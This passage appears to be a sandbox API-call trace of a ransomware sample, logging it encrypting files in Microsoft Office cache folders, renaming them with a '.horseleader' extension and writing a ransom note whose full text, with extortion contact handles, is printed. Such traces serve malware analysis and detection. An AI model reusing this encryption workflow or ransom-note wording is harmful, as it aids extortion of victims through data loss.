(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0195.722] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.horseleader") returned 88 [0195.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.horseleader")) returned 1 [0195.723] GetProcessHeap () returned 0x780000 [0195.723] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0195.723] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0195.723] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Windows") returned -1 [0195.723] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0195.725] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".horseleader") returned 0x0 [0195.725] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0195.725] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="_uninstalling_.png") returned 1 [0195.725] lstrlenW (lpString=".testttjffg") returned 11 [0195.725] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", lpSrch=".testttjffg") returned 0x0 
[0195.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.725] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.725] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0195.726] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0195.726] StrStrW (lpFirst="InfoPathMUI.msi", lpSrch=".txt") returned 0x0 [0195.726] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=3124224) returned 1 [0195.726] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.726] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.753] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.753] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.754] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x17ae00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.754] ReadFile (in: 
hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.757] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.757] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.757] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2f5c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.757] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.849] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.849] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.849] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.849] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0195.850] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, 
lpOverlapped=0x0) returned 1 [0195.850] CloseHandle (hObject=0x21c) returned 1 [0195.850] GetProcessHeap () returned 0x780000 [0195.850] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0195.850] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.horseleader") returned 94 [0195.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.horseleader")) returned 1 [0195.851] GetProcessHeap () returned 0x780000 [0195.851] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0195.851] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0195.851] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Windows") returned -1 [0195.852] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0195.852] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".horseleader") returned 0x0 [0195.852] lstrcmpW 
(lpString1="InfoPathMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0195.852] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2="_uninstalling_.png") returned 1 [0195.852] lstrlenW (lpString=".testttjffg") returned 11 [0195.852] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".testttjffg") returned 0x0 [0195.852] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.852] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.852] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0195.853] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0195.853] StrStrW (lpFirst="InfoPathMUI.xml", lpSrch=".txt") returned 0x0 [0195.853] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1231) returned 1 [0195.853] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x4cf, lpOverlapped=0x0) returned 1 [0195.855] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffb31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.855] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 
lpNumberOfBytesWritten=0x32af06c*=0x4cf, lpOverlapped=0x0) returned 1 [0195.856] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.856] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0195.856] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0195.856] CloseHandle (hObject=0x21c) returned 1 [0195.857] GetProcessHeap () returned 0x780000 [0195.857] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0195.857] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.horseleader") returned 94 [0195.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.horseleader")) returned 1 [0195.858] GetProcessHeap () returned 0x780000 [0195.858] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0195.858] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, 
ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0195.858] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0195.858] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0195.858] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0195.858] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0195.858] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0195.858] lstrlenW (lpString=".testttjffg") returned 11 [0195.858] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0195.858] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.859] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.859] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0195.859] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0195.859] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0195.859] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1852) returned 1 
[0195.859] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x73c, lpOverlapped=0x0) returned 1 [0195.862] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.862] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x73c, lpOverlapped=0x0) returned 1 [0195.863] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.863] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0195.863] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0195.863] CloseHandle (hObject=0x21c) returned 1 [0195.863] GetProcessHeap () returned 0x780000 [0195.863] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0195.864] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0195.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: 
"c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0195.864] GetProcessHeap () returned 0x780000 [0195.865] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0195.865] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0195.865] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0195.865] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0195.865] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0195.865] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0195.866] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0195.867] lstrlenA (lpString="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") returned 1368 [0195.867] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0195.867] CloseHandle (hObject=0x1cc) returned 1 [0195.867] GetProcessHeap () returned 0x780000 [0195.867] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0195.867] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0195.868] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0195.868] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned 66 [0195.868] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0195.868] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0195.868] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0195.868] GetProcessHeap () returned 0x780000 [0195.868] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0195.868] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*") returned 68 [0195.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0195.970] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0195.970] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.") returned 68 [0195.970] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0195.970] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0195.970] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0195.970] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0195.970] lstrlenW (lpString=".testttjffg") returned 11 [0195.970] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0195.970] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.970] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0195.971] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0195.971] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0195.971] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0195.971] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\..") returned 69 [0195.971] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0195.971] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0195.971] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0195.971] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0195.971] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0195.971] lstrlenW (lpString=".testttjffg") returned 11 [0195.971] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0195.971] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.971] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
